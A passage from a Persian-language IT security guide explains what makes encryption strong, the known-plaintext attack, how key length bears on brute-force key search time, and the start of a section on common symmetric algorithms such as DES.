‫ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﻃﻮﻻﻧﻲﺗﺮ ﻣﺸﻜﻠﺘﺮ ﺍﺳﺖ؛‬
‫ﺩﺷﻮﺍﺭ ﺑﻮﺩﻥ ﻣﻌﻜﻮﺱ ﻛﺮﺩﻥ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺪﻭﻥ ﺩﺍﻧﺴﺘﻦ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ )ﺷﻜﺴﺘﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ(؛‬ ‫•‬
‫ﻋﺪﻡ ﻭﺟﻮﺩ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ‪ ،‬ﻳﺎ ﺷﺮﺍﻳﻂ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﻳﻚ ﻓﺎﻳﻞ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﺪﻭﻥ ﺩﺍﻧﺴﺘﻦ ﻛﻠﻴـﺪ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﺁﺳـﺎﻧﺘﺮ‬ ‫•‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﺩ؛‬
‫ﻧﺎﻣﻤﮑﻦ ﺑﻮﺩﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻳﻚ ﭘﻴﺎﻡ ﻛﻪ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ‪ ،‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﺪﺍﻧﻴﺪ ﭼﮕﻮﻧﻪ ﺑﺨﺸﻲ ﺍﺯ ﺁﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﺷـﻮﺩ‬ ‫•‬
‫)ﻛﻪ ﺣﻤﻠﻪ ﻣﺘﻦ ﺳﺎﺩﺓ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ‪ ٨٠‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ(؛ ﻭ‬
‫ﻼ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﮔﺮ ﻫﻤﺔ ﭘﻴﺎﻣﻬﺎﻱ ﺭﻣﺰﺷـﺪﻩ ﺩﺭ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬ ‫ﺧﺼﻮﺻﻴﺎﺕ "ﻣﺘﻦ ﺳﺎﺩﻩ" ﻭ ﺩﺍﻧﺶ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﻪ ﺁﻥ ﺧﺼﻮﺻﻴﺎﺕ‪ ،‬ﻣﺜ ﹰ‬ ‫•‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺎ ﻳﻚ ﻗﻄﻌﻪ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ "ﻣﺘﻦﺳﺎﺩﻩ" ﺷﺮﻭﻉ ﺷﻮﺩ ﻳﺎ ﺧﺎﺗﻤﻪ ﻳﺎﺑﺪ‪ ،‬ﺁﻥ ﺳﻴﺴﺘﻢ ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻠﻪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﺪ‪.‬‬

‫‪78‬‬ ‫‪Session Random Key‬‬


‫‪79‬‬ ‫‪Strength‬‬
‫‪80‬‬ ‫‪Known Plaintext Attack‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٩٤‬‬

‫ﺩﺭ ﺣﺎﻟﺖ ﻛﻠﻲ ﺍﺳﺘﺤﻜﺎﻡ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺛﺒﺎﺕ ﻧﻤﻲﺷﻮﺩ؛ ﺑﻠﻜﻪ ﺗﻨﻬﺎ ﺭﺩ ﻣﻲﺷﻮﺩ‪ .‬ﻭﻗﺘﻲ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺪﻳﺪ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ‪ ،‬ﻣﺒﺘﻜـﺮ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﻴﺸﻪ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭ ﺍﺳﺖ ﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﻀﻤﻴﻦﻛﻨﻨﺪﺓ ﺍﻣﻨﻴﺖ ﻛﺎﻣﻞ ﺍﺳﺖ ‪ -‬ﻳﻌﻨﻲ ﻣﺒﺘﻜﺮ ﻣﻌﺘﻘـﺪ ﺍﺳـﺖ ﻛـﻪ ﺭﺍﻫـﻲ ﺑـﺮﺍﻱ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ ﺭﻣﺰﺷﺪﻩ ﺑﺪﻭﻥ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺮﺑﻮﻃﻪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ ،‬ﭼﺮﺍ ﻛﻪ ﺍﮔﺮ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺩﺍﺭﺍﻱ ﻳـﻚ ﻧﻘـﺺ ﺷـﻨﺎﺧﺘﻪ ﺷـﺪﻩ‬
‫ﻻ ﻣﺒﺘﻜﺮ ﺩﺭ ﻭﺣﻠﻪ ﺍﻭﻝ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻧﻤﻲﻛﻨﺪ )ﻳﺎ ﺣﺪﺍﻗﻞ ﺑﺎ ﺧﻴﺎﻝ ﺁﺳﻮﺩﻩ ﺁﻧﺮﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻧﻤﻲﻛﻨﺪ(‬
‫ﺑﺎﺷﺪ‪ ،‬ﺍﺻﻮ ﹰ‬
‫ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ ﺍﺯ ﺑﺮﺭﺳﻲ ﺍﺳﺘﺤﻜﺎﻡ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ‪ ،‬ﻳﻚ ﺭﻳﺎﺿﻴﺪﺍﻥ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺸﺎﻥ ﺩﻫﺪ ﻛﻪ ﺍﻟﮕﻮﺭﺗﻴﻢ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻧـﻮﺍﻉ ﺧﺎﺻـﻲ ﺍﺯ ﺣﻤـﻼﺕ‬
‫ﻼ ﺑﺮﺍﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻥ ﻧﻘﺎﻳﺺ ﺳﺎﻳﺮ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺑﻜﺎﺭ ﺭﻓﺘﻪﺍﻧﺪ ﻣﻘﺎﻭﻡ ﺍﺳﺖ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺣﺘﻲ ﺍﻟﮕﻮﺭﻳﺘﻤﻲ ﻛـﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﻫﻤـﺔ ﺣﻤـﻼﺕ‬‫ﻛﻪ ﻗﺒ ﹰ‬
‫ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﻣﻘﺎﻭﻡ ﺑﺎﺷﺪ ﻫﻢ ﺍﻟﺰﺍﻣﹰﺎ ﺍﻳﻤﻦ ﻧﻴﺴﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﻄﻮﺭ ﻣﺘﻮﺍﻟﻲ ﺍﻧﻮﺍﻉ ﺟﺪﻳﺪ ﺣﻤﻼﺕ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ‪.‬‬
‫ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺮﺧﻲ ﺍﺯ ﺍﻓﺮﺍﺩ ﻳﺎ ﻣﺆﺳﺴﺎﺕ ﺍﺩﻋﺎ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻛﻪ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺯﻳـﺎﺩﺗﺮﻱ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ‬
‫ﻣﻮﺟﻮﺩ ﺩﺍﺭﻧﺪ ﺍﺑﺪﺍﻉ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﻋﻤﻮﻣﹰﺎ ﻧﺒﺎﻳﺪ ﺍﺯ ﺍﻳﻦ ﺍﺩﻋﺎﻫﺎ ﺯﻳﺎﺩ ﺍﺳﺘﻘﺒﺎﻝ ﻛﺮﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻣـﺮﻭﺯﻩ ﻫـﻴﭻ ﺣﻤﻠـﺔ ﺷـﻨﺎﺧﺘﻪ ﺷـﺪﻩﺍﻱ ﺩﺭ ﻣﻘﺎﺑـﻞ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻄﻮﺭ ﮔﺴﺘﺮﺩﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﺩﻟﻴﻠﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺪﻳـﺪ‬
‫ﻭ ﺁﺯﻣﻮﻥﻧﺸﺪﻩ ‪ -‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ ﻧﻘﺎﻳﺺ ﭘﻨﻬﺎﻥ ﺑﺎﺷﻨﺪ ‪ -‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬

‫ﻃﻮﻝ ﻛﻠﻴﺪ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﻣﺘﻘﺎﺭﻥ‬


‫ﻛﻠﻴﺪﻫﺎﻱ ﺑﺎ ﻃﻮﻝ ﻛﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻣﻨﻴﺖ ﭘﻴﺎﻣﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﻪ ﻣﻴﺰﺍﻥ ﺯﻳﺎﺩﻱ ﺧﺪﺷﻪﺩﺍﺭ ﻛﻨﻨﺪ‪ ،‬ﺯﻳﺮﺍ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﭘﻴـﺎﻡ ﺭﺍ ﺑـﺎ ﻫـﺮ‬
‫ﻛﻠﻴﺪ ﻣﻤﻜﻦ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ ﺗﺎ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﺍﺳﺘﺨﺮﺍﺝ ﺷﻮﺩ‪ .‬ﺍﻣﺎ ﺿﻤﻦ ﺍﻳﻨﻜﻪ ﻛﻠﻴﺪﻫﺎﻱ ﻛﻮﺗـﺎﻩ ﺍﻳﻤﻨـﻲ ﻧـﺴﺒﺘﹰﺎ ﻛﻤـﻲ ﻓـﺮﺍﻫﻢ ﻣـﻲﻛﻨﻨـﺪ‪،‬‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻃﻮﻻﻧﻲ ﻫﻢ ﺩﺭ ﻋﻤﻞ ﻟﺰﻭﻣﹰﺎ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺑـﺎ ﻃـﻮﻝ ﻣﺘﻌـﺎﺩﻝ ﻓـﺮﺍﻫﻢ ﻧﻤـﻲﻧﻤﺎﻳﻨـﺪ‪ .‬ﻳﻌﻨـﻲ ﻫﺮﭼﻨـﺪ‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ‪ ۴۰‬ﺗﺎ ‪ ۵۶‬ﺑﻴﺘﻲ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ‪ ،‬ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ‪ ۲۵۶‬ﺑﻴﺘﻲ ﺍﻣﻨﻴﺖ ﭼﻨﺎﻥ ﺯﻳﺎﺩﺗﺮﻱ ﺍﺯ ﻳـﻚ ﻛﻠﻴـﺪ ‪ ۱۶۸‬ﻳـﺎ ﺣﺘـﻲ‬
‫‪ ۱۲۸‬ﺑﻴﺘﻲ ﻓﺮﺍﻫﻢ ﻧﻤﻲﻛﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺗﻼﺵ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﻳﻚ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ ﻭ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ ﺭﺍ ﻧﺪﺍﺭﻳﺪ‪ ،‬ﺁﺳﺎﻧﺘﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﭘﻴـﺎﻡ ﺍﻧﺠـﺎﻡ‬
‫ﻳﻚ ﺣﻤﻠﺔ ‪ brute force‬ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺣﻤﻼﺕ ﻫﻤﭽﻨﻴﻦ "ﺣﻤﻼﺕ ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﭼﻮﻥ ﻫﺮ ﻛﻠﻴـﺪ ﻣﻤﻜـﻦ ﺭﺍ ﺁﺯﻣـﺎﻳﺶ‬
‫ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﻣﺸﺨﺺ ﺷﻮﺩ ﻛﻪ ﺁﻳﺎ ﺁﻥ ﻛﻠﻴﺪ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ‪ .‬ﺍﮔﺮ ﻛﻠﻴﺪ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﺍﻧﺘﺨﺎﺏ ﺷـﻮﺩ‪ ،‬ﺁﻧﮕـﺎﻩ ﻣﻬـﺎﺟﻢ ﺑﻄـﻮﺭ‬
‫ﻣﺘﻮﺳﻂ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻛﻪ ﻧﺼﻒ ﻫﻤﺔ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﻣﻤﻜﻦ ﺭﺍ ﺑﺮﺍﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻭﺍﻗﻌﻲ ﺁﺯﻣﺎﻳﺶ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺩﺭ ﺩﺍﺧﻞ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﻳﻚ ﺭﺷﺘﻪ ﺍﺭﻗﺎﻡ ﺩﻭﺩﻭﻳﻲ‪ ٨١‬ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﻫﺮﻋﺪﺩ ﺩﻭﺩﻭﻳﻲ ﻣﻲﺗﻮﺍﻧﺪ ‪ ۰‬ﻳﺎ ‪ ۱‬ﺑﺎﺷﺪ‪ .‬ﺩﺭ‬
‫ﺣﺎﻟﺖ ﻛﻠﻲ‪ ،‬ﻫﺮ ﺑﻴﺖ ﻛﻪ ﺑﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﺍﺿﺎﻓﻪ ﺷﻮﺩ ﺗﻌﺪﺍﺩ ﻛﻠﻴﺪﻫﺎ ﺭﺍ ﺩﻭﺑﺮﺍﺑﺮ ﻣﻲﻛﻨﺪ‪ .‬ﻟﺬﺍ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﮐﻪ "ﭼﻪ ﺗﻌﺪﺍﺩ ﺑﻴﺖ ﺑﺮﺍﻱ ﺳـﺎﺧﺘﻦ ﻳـﻚ‬
‫ﻛﻠﻴﺪ ﺍﻳﻤﻦ ﻛﺎﻓﻲ ﺍﺳﺖ" ﺑﺴﺘﮕﻲ ﺑﻪ ﺍﻳﻦ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺎ ﭼﻪ ﺳﺮﻋﺘﻲ ﺑﺘﻮﺍﻧﺪ ﻛﻠﻴﺪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺁﺯﻣـﺎﻳﺶ ﻛﻨـﺪ ﻭ ﺷـﻤﺎ ﺑﺨﻮﺍﻫﻴـﺪ ﭼـﻪ‬
‫ﻣﺪﺗﻲ ﺍﻃﻼﻋﺎﺗﺘﺎﻥ ﺭﺍ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺭﻳﺪ‪ .‬ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ‪ ۱۰‬ﻛﻠﻴﺪ ﺭﺍ ﺩﺭ ﻫﺮ ﺛﺎﻧﻴﻪ ﺁﺯﻣﺎﻳﺶ ﻛﻨﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﻳﻚ ﻛﻠﻴﺪ ‪ ۴۰‬ﺑﻴﺘـﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﻳـﻚ‬
‫ﭘﻴﺎﻡ ﺭﺍ ﺑﻴﺶ ﺍﺯ ‪ ۳۴۸۴‬ﺳﺎﻝ ﺣﻔﺎﻇﺖ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭼﻨﺪﻳﻦ ﻫﺰﺍﺭ ﻛﻠﻴـﺪ ‪ -‬ﻭ ﺑـﺎ ﺳـﺨﺖﺍﻓـﺰﺍﺭ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﻣﺨﺼﻮﺹ‪ ،‬ﺻﺪﻫﺎ ﻫﺰﺍﺭ ﻛﻠﻴﺪ ‪ -‬ﺭﺍ ﺩﺭ ﺛﺎﻧﻴﻪ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻨﺪ‪ .‬ﺳﺮﻋﺖ ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﺔ ﻣـﺸﺎﺑﻪ ﺭﻭﻱ ﺻـﺪﻫﺎ ﻳـﺎ‬
‫ﻫﺰﺍﺭﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺑﻄﻮﺭ ﻫﻤﺰﻣﺎﻥ‪ ،‬ﺑﻴﺶ ﺍﺯ ﺍﻳﻦ ﻫﻢ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ‪ .‬ﭘﺲ ﺑﺎ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻣﻜﺎﻥ ﺑﺮﺭﺳﻲ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻣﻴﻠﻴﻮﻥ ﻛﻠﻴﺪ ﺩﺭ ﺛﺎﻧﻴﻪ‬
‫ﻫﻢ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺍﺳﺖ‪.‬‬
‫ﺍﮔﺮ ﺗﻮﺍﻧﺎﻳﻲ ﺁﻧﺮﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻳﻚ ﻣﻴﻠﻴﻮﻥ ﻛﻠﻴﺪ ﺭﻣﺰ ﺭﺍ ﺩﺭ ﺛﺎﻧﻴﻪ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﻤﺎﻡ ﻛﻠﻴﺪﻫﺎﻱ ‪ ۴۰‬ﺑﻴﺘـﻲ ﺭﺍ ﺩﺭ ﺗﻨﻬـﺎ ‪ ۱۳‬ﺭﻭﺯ‬
‫ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﻛﻠﻴﺪ ﺑﺎ ﻃﻮﻝ ‪ ۴۰‬ﺑﻴﺖ ﺑﻪ ﺍﻳﻦ ﺭﻭﺷﻨﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻧﮕﻪ ﺩﺍﺷﺘﻦ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﻧﺒﺎﺷﺪ‪ ،‬ﺑﺮﺍﻱ ﻛﻠﻴﺪ ﺍﻳﻤﻦ ﭼﻨـﺪ ﺑﻴـﺖ‬
‫ﻻﺯﻡ ﺍﺳﺖ؟ ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴﺪ ﻳﻚ ﻣﻴﻠﻴﺎﺭﺩ ﻛﻠﻴﺪ ﺭﺍ ﺩﺭ ﺛﺎﻧﻴﻪ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ ﺁﺯﻣﻮﺩﻥ ﻫﻤﺔ ﻛﻠﻴﺪﻫﺎﻱ ‪ ۸۰‬ﺑﻴﺘﻲ ﻫﻤﭽﻨﺎﻥ ﻣﺴﺘﻠﺰﻡ ‪ ۳۸‬ﻣﻴﻠﻴـﻮﻥ ﺳـﺎﻝ‬
‫ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺁﺯﻣﻮﺩﻥ ﻳﻚ ﻛﻠﻴﺪ ‪ ۱۲۸‬ﺑﻴﺘﻲ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﺍﻣﺮﻭﺯﻱ ‪ ۱۰۲۲‬ﺳﺎﻝ ﻭ ﺣﺘﻲ ﺑﺎ ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﻣﺤﺎﺳﺒﺎﺕ ﻛﻮﺍﻧﺘﻤﻲ ﺻﺪﻫﺎ ﻣﻴﻠﻴـﻮﻥ ﺳـﺎﻝ‬
‫ﻻ ﻇﺮﻑ ‪ ۴‬ﻣﻴﻠﻴﺎﺭﺩ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﻪ ﻳﻚ ﻏﻮﻝ ﻗﺮﻣﺰ ﺁﺳﻤﺎﻧﻲ ﺗﺒﺪﻳﻞ ﺷﻮﺩ ﻭ‬ ‫ﻧﻴﺎﺯ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﺧﻮﺭﺷﻴﺪ ﻣﺎ ﺍﺣﺘﻤﺎ ﹰ‬

‫‪81‬‬ ‫‪Binary Digits‬‬


‫‪٢٩٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺯﻣﻴﻦ ﺭﺍ ﻧﺎﺑﻮﺩ ﺧﻮﺍﻫﺪ ﻛﺮﺩ ‪ -‬ﻭ ﺑﺎ ﻓﺮﺽ ﺍﻳﻨﻜﻪ ﻫﻴﭽﮕﻮﻧﻪ ﺿﻌﻒ ﺩﻳﮕﺮﻱ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻲ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ‪ -‬ﻳـﻚ‬
‫ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ ۱۲۸‬ﺑﻴﺘﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﻏﻠﺐ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﺎﻓﻲ ﺑﺎﺷﺪ!‬

‫ﺍﻟﮕﻮﺭﻳﺘﻢﻫﺎﻱ ﺭﺍﻳﺞ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ‬


‫ﺍﻣﺮﻭﺯﻩ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺑﺴﻴﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫‪٨٢‬‬
‫ﻼ ﺧﻼﺻﻪ ﺷﺪﻩﺍﻧﺪ‪.‬‬‫ﺯﻳﺎﺩﻱ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﺫﻳ ﹰ‬

‫‪DES‬‬
‫‪٨٣‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺩﻩ )‪ (DES‬ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۷۷‬ﻭ ﺑﺼﻮﺭﺕ ﻳﻚ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ‪ ANSI‬ﺩﺭ‬
‫ﺳﺎﻝ ‪ ۱۹۸۱‬ﺍﻧﺘﺨﺎﺏ ﺷﺪ‪ ،‬ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻠﻮﮐﻲ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ‪ ۵۶‬ﺑﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﺑـﻪ ﭼـﻪ‬
‫ﻣﻨﻈﻮﺭﻱ ﺑﻜﺎﺭ ﺭﻭﺩ ﺩﺍﺭﺍﻱ ﭼﻨﺪ ﺣﺎﻟﺖ ﻋﻤﻠﻜﺮﺩﻱ ﻣﺨﺘﻠﻒ ﻣﻲﺑﺎﺷﺪ‪ DES .‬ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻗﻮﻱ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻃﻮﻝ ﻛﻠﻴﺪ ﻛﻮﺗﺎﻫﺶ ﻛﺎﺭﺑﺮﺩ ﺣﺎﻝ‬
‫ﺣﺎﺿﺮ ﺁﻧﺮﺍ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۸‬ﻳـﻚ ﺩﺳـﺘﮕﺎﻩ ﺑـﺎ ﻫـﺪﻑ ﺍﺧﺘـﺼﺎﺻﻲ ﺷﻜـﺴﺘﻦ ﺭﻣـﺰ ‪ DES‬ﺗﻮﺳـﻂ ﺑﻨﻴـﺎﺩ ﻃﻼﻳـﻪﺩﺍﺭﺍﻥ‬
